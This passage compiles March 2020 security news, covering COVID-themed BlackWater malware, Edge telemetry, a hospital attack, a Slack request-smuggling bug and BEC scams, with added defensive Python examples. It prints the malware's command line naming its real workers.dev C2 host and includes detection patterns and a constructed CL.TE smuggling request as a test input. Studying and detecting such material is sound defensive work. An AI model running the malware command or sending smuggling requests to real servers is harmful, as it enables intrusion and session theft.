For businesses that are not currently a customer, Cisco is also offering free 90-day trials.

"Additionally, through our partners and the Cisco sales team, we are providing free 90-day licenses to businesses who are not Webex customers in this time of need. We’re also helping existing customers meet their rapidly changing needs as they enable a much larger number of remote workers by expanding their usage at no additional cost."

Cloudflare
Cloudflare has made its Cloudflare for Teams service free for small businesses for at least six months.

"Beginning today, we are making our Cloudflare for Teams products free to small businesses around the world. Teams enables remote workers to operate securely and easily. We will continue this policy for at least the next 6 months."

Using Cloudflare for Teams, remote workers can gain access to a company's internal resources using a secure VPN.

Discord
Discord has enhanced its free Go Live streaming service so that it can now support 50 simultaneous users rather than 10.

"We wanted to find a way to help, so we’re temporarily upping the limit on Go Live to 50 people at a time, up from 10. Go Live is free to use and lets people privately stream or screen share apps from a computer while others watch on any device — so teachers can conduct a class, co-workers can collaborate, and groups can still meet. You can learn more about how to get started with Go Live here," Discord stated in a blog post.

Google
Google is giving G Suite and G Suite for Education customers free access to their Hangouts Meet video-conferencing features.

This includes these features:

Larger meetings, for up to 250 participants per call
Live streaming for up to 100,000 viewers within a domain
The ability to record meetings and save them to Google Drive
Instant Housecall
Subscribers to Instant Housecall can now create subaccounts that allow remote workers to take over their office PC. This offer will be available until the World Health Organization (WHO) designates the end of the pandemic.

"All plans now include subaccounts that let your customers work remotely. Using a subaccount that you create, your customers can login and control their own unattended PC," the announcement states.

LogMeIn
LogMeIn is providing a free Emergency Remote Work Kit that gives free 3-month site-wide licenses to GoToMeeting to make it easier for remote workers to conduct meetings.

"Starting immediately, we will be offering our critical front-line service providers with free, organization-wide use of many LogMeIn products for 3 months through the availability of Emergency Remote Work Kits. These kits will include solutions for meetings and video conferencing, webinars and virtual events, IT support and management of remote employee devices and apps, as well as remote access to devices in multiple locations. For example, the “Meet” Emergency Remote Work Kit will provide eligible organizations with a free site-wide license of GoToMeeting for 3 months," LogMeIn CEO Bill Wagner said in a blog post.

Loom
The Loom video messaging platform has announced that through July 1st, 2020 they will provide these additional features:

Remove the recording limit on our free plan — what was 25 is now unlimited
Cut the price of Loom Pro in half — what was $10/month is now $5/month
Extend all trials of Loom Pro from 14 to 30 days
Microsoft
Microsoft is making Microsoft Teams free for the next six months to aid businesses that move towards a remote workplace during the outbreak.

"At Microsoft, the health and safety of employees, customers, partners and communities is our top priority. By making Teams available to all for free for six months, we hope that we can support public health and safety by making remote work even easier," Microsoft EVP and President JP Courtois stated on Twitter.

Splashtop
Splashtop is offering free 60-day licenses to its Business Access remote access software.

"In response to the recent coronavirus outbreak, many organizations, businesses, educational institutions, and governments are recommending that people work from home to help reduce the spread of the virus. To support these remote work initiatives, Splashtop is offering its Splashtop Business Access remote computer access software free for 60 days in some of the most affected countries.

Residents of China, Hong Kong, Macau, and Taiwan are eligible for the free license,"

TechSmith
TechSmith is giving free licenses to their TechSmith Snagit screen capture software and the TechSmith Video Review software through June 30th, 2020.

"Our screen recording tool, TechSmith Snagit, and our asynchronous collaboration platform, TechSmith Video Review, will be provided for free through the end of June 2020 to any organization that needs it," TechSmith announced.

For existing customers of the TechSmith Relay or Video Review products, TechSmith is providing increased usage at no charge.

Zoho
Zoho is now offering free access to its Remotely remote work software suite through July 1st, 2020.

"Zoho Remotely will enable you to take your work remote by offering a complete suite of web and mobile apps that will help you communicate, collaborate and be productive."

Zoom
For people in China, Zoom has enhanced the Basic (free) license by removing the 40-minute meeting limit.

With this tenet in mind, Zoom is doing everything we can to provide resources and support to those navigating the coronavirus outbreak, including:

For our Basic (free) users in China, we’ve lifted the 40-minute limit on meetings with more than two participants, providing unlimited time to collaborate.
We’re proactively monitoring servers to ensure maximum reliability amid any capacity increases, as uptime is paramount.
We’re scheduling informational sessions and on-demand resources so anyone can learn how to use the Zoom platform with ease — and at their convenience.


BlackWater Malware Abuses Cloudflare Workers for C2 Communication
15.3.2020 
Bleepingcomputer  Virus

A new backdoor malware called BlackWater has been spotted pretending to be COVID-19 information while abusing Cloudflare Workers as an interface to the malware's command and control (C2) server.

Cloudflare Workers are JavaScript programs that run directly on Cloudflare's edge so that they can interact with connections from remote web clients. These Workers can be used to modify the output of a web site behind Cloudflare, disable Cloudflare features, or even act as independent JavaScript programs running on the edge that display their own output.

For example, a Cloudflare Worker can be created to search for text in a web server's output and replace words in it or to simply output data back to a web client.

BlackWater uses Cloudflare Workers as a C2 interface
Recently MalwareHunterTeam discovered a RAR file being distributed pretending to be information about the Coronavirus (COVID-19) called "Important - COVID-19.rar".

It is not known at this time how the file is being distributed, but it is most likely being done through phishing emails.

Inside this RAR file is a file called "Important - COVID-19.docx.exe" that uses a Word icon. Unfortunately, as Microsoft hides file extensions by default, many will simply see this file as a Word document rather than an executable and be more likely to open it.

Extracted file with extensions off and on
When opened, the malware will extract a Word document called "Important - COVID-19.docx.docx" to the %UserProfile%\downloads folder and open it in Word.

The opened document contains information on the COVID-19 virus and is used by the malware as a decoy while it installs the rest of the malware and executes it on the computer.

Decoy COVID-19 Information Document
While victims are reading the COVID-19 document, the malware is also extracting the %UserProfile%\AppData\Local\Library SQL\bin\version 5.0\sqltuner.exe file.

This is where things get a bit interesting as the malware is then launched using a command line that causes the BlackWater malware to connect to a Cloudflare Worker that acts as a command and control server or at least a passthrough to one.

sqltuner.exe lively-dream-c871.m7.workers.dev
When visiting this site directly, users will be shown the following 'HellCat' image.

Cloudflare worker
Head of SentinelLabs Vitali Kremez told BleepingComputer that this worker is a front end to a ReactJS Strapi App that acts as a command and control server.

Kremez stated that this C2 will respond with a JSON encoded string that may contain commands to execute when the malware connects to it with the right authentication parameters.

The BlackWater malware is, by and large, a newer generation malware taking advantage of the ReactJS Strapi App for the backend checking, leveraging Cloudflare workers resolvers and employing a JSON-based parser inside its DLL passing the server argument directly. The check-ins bear the "blackwater" marker as well as passing either email @ black.water or @ black64.water depending on the architecture.

The malware appears to be novel and its JSON-based parser with the newer generation ReactJS backend server architecture is indicative of the active development amid the CoronaVirus outbreak.

When we asked why they were using a Cloudflare Worker rather than connecting directly to the C2, Kremez felt it was to make it harder for security software to block the IP traffic without blocking all of Cloudflare's Worker infrastructure.

"I think this is why they employ as it returns back the legit Cloudflare proxy IP which acts as a reverse proxy passing the traffic to the C2. It makes blocking the IP traffic impossible given it is Cloudflare (unless the whole Cloudflare worker space is banned) infrastructure while hiding the actual C2."

While there is still plenty to learn about this new malware and how it operates, it does provide an interesting glimpse of how malware developers are utilizing legitimate cloud infrastructure in novel ways.

Using Cloudflare Workers, traffic to malware command and control servers becomes harder to block, and the malware operation can easily be scaled as needed.
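As an added example (not from the article or from the researchers quoted in it), the launch pattern described above, a non-browser executable started from a user-profile path with a workers.dev host on its command line, together with the double-extension lure, written as a small detection over process-creation events. The pipe-separated event format, the browser allowlist and the sample lines are assumptions constructed for this example; only the sqltuner.exe path, the worker hostname and the lure filename come from the article.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Constructed process-creation events (UtcTime|Image|CommandLine), modelled on the
# fields of a Sysmon Event ID 1 record. Sample data for this example, not real telemetry;
# the docs-example hostname is made up, the other two paths are the ones the article names.
SAMPLE_EVENTS = """\
2020-03-14 10:02:11|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|"chrome.exe" https://docs-example.workers.dev/
2020-03-14 10:03:45|C:\\Users\\alice\\downloads\\Important - COVID-19.docx.exe|"Important - COVID-19.docx.exe"
2020-03-14 10:03:47|C:\\Users\\alice\\AppData\\Local\\Library SQL\\bin\\version 5.0\\sqltuner.exe|sqltuner.exe lively-dream-c871.m7.workers.dev
2020-03-14 10:05:00|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs
"""

# Processes for which a workers.dev reference on the command line is ordinary (assumed allowlist).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}

# A hostname under the shared workers.dev suffix, anywhere in the command line.
WORKERS_DEV = re.compile(r"\b[\w-]+(?:\.[\w-]+)*\.workers\.dev\b", re.IGNORECASE)
# A document-looking name that actually ends in .exe (the "Important - COVID-19.docx.exe" trick).
DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|txt)\.exe$", re.IGNORECASE)
# Image path under the per-user AppData\Local tree, where the article's sqltuner.exe was dropped.
APPDATA_LOCAL = re.compile(r"\\AppData\\Local\\", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    time: str
    image: str
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse_events(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (time, image, command line) from the pipe-separated sample format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        time, image, cmdline = line.split("|", 2)
        yield time, image, cmdline


def detect(events_text: str) -> List[Finding]:
    """Apply both rules to every event and return the findings in event order."""
    findings: List[Finding] = []
    for time, image, cmdline in parse_events(events_text):
        name = basename(image)

        # Rule 1: a workers.dev host named by something that is not a browser.
        match = WORKERS_DEV.search(cmdline)
        if match and name.lower() not in BROWSERS:
            where = " (image under AppData\\Local)" if APPDATA_LOCAL.search(image) else ""
            findings.append(Finding(
                "non-browser process referencing a workers.dev host",
                time, image, match.group(0) + where))

        # Rule 2: executable masquerading as a document via a double extension.
        if DOUBLE_EXT.search(name):
            findings.append(Finding(
                "executable masquerading as a document (double extension)",
                time, image, name))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.time}  {f.rule}: {f.image}  [{f.detail}]")
```

The browser hit on a workers.dev URL is deliberately left alone, since blocking the shared suffix outright is exactly what the article says defenders cannot do without blocking all Worker traffic; the rule keys on the launching process instead.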


Research Finds Microsoft Edge Has Privacy-Invading Telemetry
15.3.2020 
Bleepingcomputer  OS  Privacy

While Microsoft Edge shares the same source code as the popular Chrome browser, it offers better privacy control for users. New research, though, indicates that it may have more privacy-invading telemetry than other browsers.

According to Microsoft, telemetry refers to the system data that is uploaded by the Telemetry components or browser's built-in services. Telemetry features aren't new to Microsoft and the company has been using Telemetry data from Windows 10 to identify issues, analyze and fix problems.

Professor Douglas J Leith, Chair of Computer Systems at Trinity College in Ireland, tested six web browsers to determine what data they were sharing. In his research, he pitted Chromium-based Microsoft Edge, Google Chrome, Brave, Russia's Yandex, Firefox and Apple Safari against one another.

Unfortunately, Microsoft Edge didn't perform well in various privacy tests.

Too much telemetry in Microsoft Edge
When testing the Edge Browser, Leith saw that every URL that was typed into Edge would be sent back to Microsoft sites.

For example, every URL typed into the address bar is shared with Bing and other Microsoft services such as SmartScreen. This was confirmed by BleepingComputer who used Fiddler to see the JSON data being sent to Microsoft.

Unhashed URL being sent to SmartScreen
This could be fixed by using a technique similar to Google's Safe Browsing implementation, which downloads a list of known malicious sites and saves it locally. The browser then checks this list, and if any data needs to be sent to Google's servers, it sends only a hashed partial URL fingerprint that can be used to track browsing behavior.
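As an added illustration (not code from the article, from Microsoft or from Google), the following shows the hashed-prefix lookup pattern the paragraph describes: the client hashes a canonical form of the URL, compares a short prefix against a locally cached list, and only on a prefix hit asks the server for the full hashes behind that prefix. The server class, its contents and the URLs are constructed for the example.

```python
"""Safe Browsing-style lookup that keeps the visited URL on the client.

Added example, not code from any browser vendor. The 'server' is a
constructed stand-in; real deployments also expand a URL into several
host/path suffix combinations before hashing."""
import hashlib
from urllib.parse import urlsplit, urlunsplit

PREFIX_LEN = 4  # bytes of the SHA-256 digest shared with the server on a hit


def canonicalize(url: str) -> str:
    """Reduce trivially different spellings of one URL to one form
    (lower-case scheme and host, drop fragment and credentials)."""
    parts = urlsplit(url.strip())
    host = parts.hostname or ""
    path = parts.path or "/"
    return urlunsplit((parts.scheme.lower(), host.lower(), path, parts.query, ""))


def url_hash(url: str) -> bytes:
    return hashlib.sha256(canonicalize(url).encode()).digest()


def url_prefix(url: str) -> bytes:
    return url_hash(url)[:PREFIX_LEN]


class MaliciousUrlServer:
    """Constructed stand-in for the remote service: holds full hashes of
    known-bad URLs and answers prefix queries with the matching full hashes."""

    def __init__(self, bad_urls):
        self.full_hashes = {url_hash(u) for u in bad_urls}
        self.queries = []  # everything the server ever learns about the client

    def prefix_list(self):
        return {h[:PREFIX_LEN] for h in self.full_hashes}

    def full_hashes_for(self, prefix: bytes):
        self.queries.append(prefix)
        return {h for h in self.full_hashes if h.startswith(prefix)}


class Client:
    def __init__(self, server):
        self.server = server
        self.local_prefixes = server.prefix_list()  # refreshed periodically

    def is_blocked(self, url: str) -> bool:
        h = url_hash(url)
        prefix = h[:PREFIX_LEN]
        if prefix not in self.local_prefixes:
            return False  # no network traffic at all for this URL
        # Prefix hit (real match or collision): fetch the full hashes for
        # that prefix and compare locally; the URL itself never leaves.
        return h in self.server.full_hashes_for(prefix)


if __name__ == "__main__":
    server = MaliciousUrlServer(["http://bad.example/login"])
    client = Client(server)
    print(client.is_blocked("http://bad.example/login"))      # True
    print(client.is_blocked("https://bank.example/account"))  # False
    print(server.queries)  # only 4-byte prefixes, never a URL
```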

The browser also sends a unique hardware identifier to Microsoft, which is a "strong and enduring identifier" that cannot be easily changed or deleted.

User tracking information being sent
Russian web browser Yandex is also engaged in similar anti-privacy activities:

From a privacy perspective Microsoft Edge and Yandex are qualitatively different from the other browsers studied. Both send persistent identifiers that can be used to link requests (and associated IP address/location) to back end servers. Edge also sends the hardware UUID of the device to Microsoft and Yandex similarly transmits a hashed hardware identifier to back end servers. As far as we can tell this behaviour cannot be disabled by users. In addition to the search autocomplete functionality that shares details of web pages visited, both transmit web page information to servers that appear unrelated to search autocomplete.

It's important to note that Microsoft Edge for Enterprise gives administrators a lot of control in deployments to disable all these trackers, but the trackers are enabled by default in all Edge installations.

While Microsoft Edge didn't fare well in the tests, the researcher has also questioned Chrome's and other browsers' behaviour.

Users have previously noticed that Chrome scans the entire computer and reports hashes of executable programs back to Google to build Chrome's Safe Browsing platform.

Chrome, Firefox and Safari share details of every webpage you visit with their services. All these browsers use the autocomplete feature to send web addresses to their services in real time.

Firefox's telemetry transmissions, which are silently enabled by default, can potentially be used to link these over time. In Firefox, there is also an open WebSocket for push notifications and it is linked to a unique identifier, which could be used for tracking, according to the researcher.


COVID-19 Testing Center Hit By Cyberattack
15.3.2020 
Bleepingcomputer  Attack

Hospitals around the world struggle with ever-growing waves of COVID-19 infections but the efforts in one testing center in Europe are being hampered by cybercriminal activity.

Computer systems at the University Hospital Brno in the Czech Republic were shut down on Friday due to a cyberattack that struck in the wee hours of the day.

This comes at a time when there are more than 140 confirmed infections in the country and around 4,800 people in quarantine. The government has declared a state of emergency and imposed stern restrictions on crossing the border.

The University Hospital Brno hosts one of the 18 laboratories the Czech Republic uses for testing for the new coronavirus. Since the outbreak, the institution did up to 20 tests a day.

Not all systems are down
Little information has been released about the attack, which occurred on Friday morning, around 2 a.m. local time. Its nature remains unknown but it would not be a surprise if it were a ransomware incident. At the time of writing, the hospital's website was down.

Due to the attack, the results for COVID-19 tests in the past couple of days, estimated at dozens, have been delayed. It typically takes a day to get the results.

According to the Czech News Agency (ČTK), the director of the hospital, Jaroslav Štěrba, told reporters that computer systems started "falling gradually" and "had to be shut down." Members of the staff received instructions not to turn on the computers.

Systems serving laboratories like hematology, microbiology, biochemistry, tumor diagnostics, or radiology appear to be on a different network than the affected systems as they continue to work.

Basic operations are still possible at the hospital and patients are still being examined, despite the attack. However, medical data collected by lab systems is stuck there and cannot be recorded in databases.

Prescriptions are written by hand or typed, leading to longer examination times. This happens at a point when every minute counts and doctors need all the help they can get in dealing with COVID-19 infections.

The National Cyber and Information Security Agency (NÚKIB) has been called in and is working to identify the root of the problem and remedy the situation. The National Organized Crime Center is also involved in the case.

Because the state of emergency had already been declared in the country when the attack occurred, the investigators will treat it with priority and aggravated circumstances will be considered for prosecution.

Malware in the time of COVID-19
Some ransomware operators, like Maze, intentionally avoid targeting critical services. They told BleepingComputer that they "don’t attack hospitals, cancer centers, maternity hospitals and other socially vital objects."

Other ransomware actors, though, have no problem attacking healthcare units. At the beginning of 2018, SamSam hit at least two hospitals in the U.S.

Ryuk also has no qualms about attacking hospitals. Last year, DCH hospitals in Alabama paid what the cybercriminals demanded for the decryption key that unlocked the medical data.

Other threat actors are also trying to capitalize on this global health crisis and have created malware or launched attacks with a COVID-19 theme. A new ransomware strain was discovered this week, and BEC scammers are using the outbreak in an attempt to persuade victims to send money to a different account.

DomainTools also found a new malware for Android phones that locks them up and demands a ransom of $100 in bitcoin. CovidLock, as the researchers named it, locks the phone screen and threatens to delete contacts, pictures, and videos. The ransom note also claims to leak social media accounts to the public.

This is a screen-locker and, starting with Android 7.0 (Nougat), there is protection against it if a password is already set. CovidLock can still affect devices where unlocking the screen is not password protected.

DomainTools has obtained the decryption key for the unlock password set by CovidLock and will soon make it public, along with the technical details of its research.


Slack Bug Allowed Automating Account Takeover Attacks
15.3.2020 
Bleepingcomputer  Vulnerebility

Slack has fixed a security flaw that allowed hackers to automate the takeover of arbitrary accounts after stealing session cookies using an HTTP Request Smuggling CL.TE hijack attack on https://slackb.com/.

Web security researcher and bug bounty hunter Evan Custodio reported the bug to the team collaboration platform's security team via Slack's HackerOne bug bounty program on November 14th.

The researcher discovered the vulnerability after targeting several HTTP Request Smuggling (1, 2) exploits on Slack in-scope assets using tooling he developed.

Slack fixed the bug within 24 hours according to the bug report's timeline and rewarded Custodio with a $6,500 bounty, with the report being publicly disclosed just two days ago.

Bug could have led to a massive data breach
Custodio says that the bug was "extremely critical" for both Slack and all the platform's customers and organizations that share private data, channels, and conversations on Slack as it "could lead to a massive data breach of a majority of customer data."

Using an attack targeting this bug would have allowed malicious actors to create automated bots that could attack the vulnerable in-scope Slack asset continuously, jump onto a victim's session, and steal all reachable data.

As Custodio further explained in his detailed write-up, the bug chain that allowed him to steal session cookies included multiple steps.

HTTP Request Smuggling CL.TE attack
Gaining access to the session cookies
The researcher "exploited an HTTP Request Smuggling bug on a Slack asset to perform a CL.TE-based hijack onto neighboring customer requests," the bug report reads.

"This hijack forced the victim into an open-redirect that forwarded the victim onto the researcher's collaborator client with slack domain cookies.

"The posted cookies in the customer request on the collaborator client contained the customer's secret session cookie. With this attack, the researcher was able to prove session takeover against arbitrary slack customers."

Once the cookies got stolen, attackers would only have to plug the cookies into a browser and gain full control of the account, being able to collect and exfiltrate all the data.
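A CL.TE desynchronization can only occur when a request carries ambiguous body framing that two hops interpret differently, so the defensive check is to refuse to forward such requests. The following is an added example of that check (not code from Slack or from the researcher's write-up), implementing the RFC 7230 section 3.3.3 rule that a message with both Content-Length and Transfer-Encoding is an error, plus the related checks for conflicting or malformed framing headers; the sample requests are constructed.

```python
"""Framing check a front-end proxy can apply before forwarding a request.

Added example, not from Slack or the bug report. Returns a decision and a
reason; it does not try to repair a request, because 'repairing' is where
two parsers start to disagree."""
import re

# Header field names must be RFC 7230 tokens; a space before the colon
# ("Transfer-Encoding : chunked") is one way to make one parser see the
# header and another ignore it, so it is rejected outright.
TOKEN = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")


def parse_headers(raw: bytes):
    """Split a request head into (request_line, [(name, value), ...]).
    Names are lower-cased; values keep everything except leading OWS.
    Raises ValueError on malformed lines so callers reject them."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    if not lines or lines[0] == b"":
        raise ValueError("empty request line")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.match(name):
            raise ValueError("malformed header line: %r" % line)
        headers.append((name.lower(), value.lstrip(b" \t")))
    return lines[0], headers


def framing_decision(raw: bytes):
    """Return (ok, reason). ok is False whenever a compliant parser and a
    lenient one could disagree about where the body ends."""
    try:
        _, headers = parse_headers(raw)
    except ValueError as e:
        return False, str(e)
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    if cl and te:
        return False, "both Content-Length and Transfer-Encoding present"
    if len(set(cl)) > 1:
        return False, "conflicting Content-Length values"
    for v in cl:
        if not v.isdigit():
            return False, "non-numeric Content-Length: %r" % v
    if len(te) > 1:
        return False, "multiple Transfer-Encoding headers"
    for v in te:
        # Only the exact final coding 'chunked' is accepted. Variants such
        # as 'chunked ' or 'xchunked' are treated differently by different
        # servers, which is precisely the disagreement smuggling exploits.
        if v != b"chunked":
            return False, "unrecognized Transfer-Encoding: %r" % v
    return True, "unambiguous framing"


if __name__ == "__main__":
    # Constructed requests: one clean, one with both framing headers.
    clean = b"POST / HTTP/1.1\r\nHost: app.example\r\nContent-Length: 3\r\n\r\nabc"
    ambiguous = (b"POST / HTTP/1.1\r\nHost: app.example\r\nContent-Length: 6\r\n"
                 b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")
    print(framing_decision(clean))      # (True, 'unambiguous framing')
    print(framing_decision(ambiguous))  # (False, 'both Content-Length and ...')
```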

So I did promise blog posts on RS CLTE-style attacks, I guess this will have to do for now. Often times with RS hijacking you can throw a victim into an open redirect to steal their tokens/cookies. Many thanks to @SlackHQ for fixing this within 24-hours of discovery #bugbounty https://t.co/EUm6pNgjlF

— Evan Custodio (@defparam) March 12, 2020
Slack fixed another bug — within five hours from disclosure — that would have allowed attackers to steal a user's authentication token that could then provide full control over their messages and account.

That security flaw was reported by Detectify security researcher Frans Rosén three years ago, in March 2017, and it allowed attackers to set up malicious sites for stealing XOXS tokens.

The bug's disclosure earned Rosén $3,000, and Slack confirmed that they "resolved the postMessage and call-popup redirect issues, and performed a thorough investigation to confirm that this had never been exploited."


Google Is Not Creating a Nationwide Coronavirus Info Site
15.3.2020 
Bleepingcomputer  IT

In a press conference in the White House Rose Garden, President Trump announced that Google and 1,700 of its engineers are working on a new web site devoted to information about Coronavirus.

President Trump and Vice President Pence stated that this site would allow people to enter their symptoms and determine if a test was needed. If a test is recommended, the site would then direct them to the nearest location that is offering Coronavirus tests.

To help facilitate the testing for Coronavirus, Walmart, CVS, Target, and Walgreens have announced that they will be volunteering a portion of their parking lots to be set up as drive-through Coronavirus testing sites.

These locations would allow people to drive up and receive a test without having to leave their car.

Vice President Pence said that more information about the availability of Google's site will be ready this weekend.

"By this Sunday evening, we will be able to give specific guidance on when the web site will be available. You can go to the web site, as the President said, you type in your symptoms and be given direction whether or not a test is indicated. And then at the same web site, you will be directed to one of these incredible companies that are gonna give a little bit of their parking lot so that people can come by and be given a drive-by test," Vice President Pence stated.

Soon after this press conference, the Google Communications Twitter account stated that another Alphabet company named Verily is in the early stages of creating a tool for testing in the San Francisco Bay area, with possible expansion at a later date.

Google Tweet

This tool, though, is not being designed for nationwide access and it is not ready as of yet.

This press conference can be seen below.

Update 3/14/20: This story has been updated to reflect Google's statement that they are not creating a nationwide web site.


Ancient Tortoise BEC Scammers Launch Coronavirus-Themed Attack
15.3.2020 
Bleepingcomputer  Spam

A Business Email Compromise (BEC) cybercrime group has started using coronavirus-themed scam emails that take advantage of the COVID-19 global outbreak to convince potential victims to send payments to attacker-controlled accounts.

In a report shared with BleepingComputer, Agari Cyber Intelligence Division (ACID) researchers say that they "believe this attack is the first reported example of BEC (business email compromise) actors exploiting the global COVID-19 event."

This scammer group tracked by Agari researchers as Ancient Tortoise is known for actively using financial aging reports in BEC attacks.

Aging reports (also known as a schedule of accounts receivable) are sets of outstanding invoices that help a company's financial department to track customers who haven't paid goods or services bought on credit.

Ancient Tortoise gains the trust of employees by asking for aging reports while impersonating a company's executives and then asking the customers to pay the outstanding invoices listed in the aging report.

Coronavirus-powered BEC scam
Yesterday, as part of an ongoing BEC scam investigation and multiple email exchanges with Ancient Tortoise actors, Agari researchers received a coronavirus-themed scam email that instructed the personas (aka non-paying customers listed on a fake aging report) used as part of the research to pay an overdue invoice using a different bank account.

"Due to the news of the Corona-virus disease (COVID-19) we are changing banks and sending payments directly to our factory for payments, so please let me know total payment ready to be made so I can forward you our updated payment information," the scam email reads.

Agari's researchers received a Hong Kong mule account where the money should be sent once the scammers were told that the payment would be wired as soon as possible.

It took about three weeks for the attackers to send the coronavirus-themed scam email after their initial contact with the researchers, between February 17th when the request for an aging report landed in Agari's inboxes and March 9th when they launched the final attack on the fake vendor.

Until now, although threat actors have been sending coronavirus-themed spam emails to targets since January, most were sent as part of spam campaigns used to deliver malware payloads and to phish for credentials.

Coronavirus-themed scam email (Agari)
Several BEC groups are using aging reports in attacks
Ancient Tortoise is just one of the BEC scammer groups tracked by Agari, with Silent Starling, Curious Orca, and Scattered Canary being other actors known for running elaborate BEC schemes leading to the compromise of hundreds of employees from companies from all over the world.

"In one case, Silent Starling received a consolidated aging report that included details for more than 3,500 customers with past due payments totaling more than $6.5 million," Agari said.

To defend against BEC attacks, Agari recommends that vendors and suppliers who are initially targeted via executive impersonation attacks implement strong email authentication and anti-phishing email protections focused on defending against advanced identity deception attacks and brand spoofing.

Companies working with external suppliers are advised to also set up a formal process for handling outgoing payments when suppliers are changing the normal payment account to efficiently prevent such attacks.

BEC scams behind $1.8 billion in losses in 2019
The FBI's Internet Crime Complaint Center (IC3) 2019 Internet Crime Report, published in February, says that BEC was the cybercrime type with the highest reported total victim losses last year, reaching almost $1.8 billion in losses following attacks that targeted wire transfer payments of individuals and businesses.

IC3 also observed an increased number of diversion of payroll funds BEC complaints where fraudsters change employees' direct deposit information by tricking their company's human resources or payroll departments.

The FBI also warned private industry partners in early March that threat actors are abusing Microsoft Office 365 and Google G Suite as part of BEC attacks.

"Between January 2014 and October 2019, the Internet Crime Complaint Center (IC3) received complaints totaling over $2.1 billion in actual losses from BEC scams targeting Microsoft Office 365 and Google G Suite," the FBI said in a Private Industry Notification (PIN) from March 3.


US Govt Shares Tips on Securing VPNs Used by Remote Workers
15.3.2020 
Bleepingcomputer  BigBrothers

The Department of Homeland Security's cybersecurity agency today shared tips on how to properly secure enterprise virtual private networks (VPNs) seeing that a lot of organizations have made working from home the default for their employees in response to the Coronavirus disease (COVID-19) pandemic.

"As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity," an alert published today says.

Malicious actors expected to focus attacks on teleworkers
Since more and more employees have switched to using their org's VPNs for teleworking, threat actors will increasingly focus their attacks on VPN security flaws that will be less likely to get patched in time if work schedules are spread around the clock.

CISA also highlights the fact that malicious actors might also increase their phishing attacks to steal the user credentials of employees working from home, with orgs that haven't yet implemented multi-factor authentication (MFA) for remote access being the most exposed.

Is your organization teleworking because of #COVID19? Here are some https://t.co/tcA8Kr6DTq key recommendations on enterprise VPN security. #CyberVigilance #Cyber Cybersecurity #Infosec

— US-CERT (@USCERT_gov) March 13, 2020
"Organizations may have a limited number of VPN connections, after which point no other employee can telework," CISA adds.

"With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks."

Mitigations for boosting enterprise VPN security
Among the mitigation measures recommended for organizations considering telework options for their employees because of the Coronavirus disease (COVID-19) pandemic, CISA lists:

• Keeping VPNs, network infrastructure devices, and devices used for remote work up to date (apply the latest patches and security configs).
• Notifying employees of an expected increase in phishing attempts.
• Ensuring that IT security staff are ready for remote log review, attack detection, and incident response and recovery.
• Implementing MFA on all VPN connections or requiring employees to use strong passwords to defend against future attacks.
• Testing VPN infrastructure limitations in preparation for mass usage and taking measures such as rate-limiting to prioritize users that will require higher bandwidths.
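Two of the items above (remote log review and attack detection, and the exposure of accounts without MFA) can be exercised directly against VPN authentication logs. The following is an added example, not part of CISA's alert: the log format, the host names and every line of the sample log are constructed, and the thresholds are assumptions a team would tune to its own traffic.

```python
"""Small review pass over VPN authentication logs.

Added example, not from CISA. Flags (a) one source address failing against
many distinct accounts in a short window, the signature of password
spraying, and (b) successful logins that did not pass a second factor."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<ISO timestamp> <host> user=<u> src=<ip> result=OK|FAIL mfa=yes|no"
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) "
    r"result=(?P<result>OK|FAIL) mfa=(?P<mfa>yes|no)$"
)

# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = """\
2020-03-13T08:00:01Z vpn01 user=alice src=198.51.100.7 result=OK mfa=yes
2020-03-13T08:00:05Z vpn01 user=alice src=203.0.113.9 result=FAIL mfa=no
2020-03-13T08:00:06Z vpn01 user=bob src=203.0.113.9 result=FAIL mfa=no
2020-03-13T08:00:07Z vpn01 user=carol src=203.0.113.9 result=FAIL mfa=no
2020-03-13T08:00:08Z vpn01 user=dave src=203.0.113.9 result=FAIL mfa=no
2020-03-13T08:00:09Z vpn01 user=erin src=203.0.113.9 result=FAIL mfa=no
2020-03-13T08:00:10Z vpn01 user=frank src=203.0.113.9 result=OK mfa=no
2020-03-13T09:30:00Z vpn01 user=bob src=198.51.100.22 result=OK mfa=yes
""".splitlines()


def parse(lines):
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # unparseable lines are skipped, not guessed at
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(d)
    return events


def find_spraying(events, window=timedelta(minutes=10), min_users=5):
    """Flag a source IP whose failures inside one sliding window cover at
    least min_users distinct accounts (thresholds are assumptions)."""
    by_src = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            by_src[e["src"]].append(e)
    findings = []
    for src, fails in by_src.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in fails[start:end + 1]}
            if len(users) >= min_users:
                findings.append({"src": src, "users": sorted(users)})
                break  # one finding per source is enough for triage
    return findings


def find_logins_without_mfa(events):
    """Successful logins with no second factor: the exposure the alert
    calls out for orgs that have not yet rolled out MFA on remote access."""
    return [{"user": e["user"], "src": e["src"], "ts": e["ts"]}
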